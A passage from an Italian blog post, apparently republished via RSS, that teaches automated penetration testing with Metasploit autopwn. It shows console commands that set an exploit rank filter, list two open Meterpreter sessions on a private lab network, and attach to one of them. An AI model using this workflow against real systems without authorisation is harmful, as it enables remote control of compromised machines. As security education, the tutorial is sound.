msf &gt; setg MinimumRank excellent<br />
</code><br />
Per interagire con le eventuali sessioni aperte, si usa il comando sessions -i [ID].<br />
<code><br />
msf &gt; sessions -l</code><br />
<code><br />
Active sessions<br />
===============</code><br />
<code><br />
Id  Description  Tunnel<br />
--  -----------  ------<br />
1   Meterpreter  192.168.1.10:50510 -&gt; 192.168.1.253:34152<br />
2   Meterpreter  192.168.1.10:54367 -&gt; 192.168.1.253:21538</code><br />
<code><br />
msf &gt;<br />
</code><br />
<code><br />
msf &gt; sessions -i 2<br />
[*] Starting interaction with 2…</code></p>
<p><code><br />
meterpreter &gt;</code></p>
<p>FONTE:www.voipandhack.it</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ago1980.wordpress.com/674/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ago1980.wordpress.com/674/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ago1980.wordpress.com/674/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ago1980.wordpress.com/674/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/ago1980.wordpress.com/674/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/ago1980.wordpress.com/674/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/ago1980.wordpress.com/674/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/ago1980.wordpress.com/674/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ago1980.wordpress.com/674/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ago1980.wordpress.com/674/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ago1980.wordpress.com/674/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ago1980.wordpress.com/674/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ago1980.wordpress.com/674/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ago1980.wordpress.com/674/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ago1980.wordpress.com&amp;blog=2504298&amp;post=674&amp;subd=ago1980&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://ago1980.wordpress.com/2010/02/12/automazione-di-penetration-con-metasploit-autopwn/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/916910d22d67e1d6d8fe1099d7e45a2f?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">ago1980</media:title>
		</media:content>
	</item>
	</channel>
</rss>
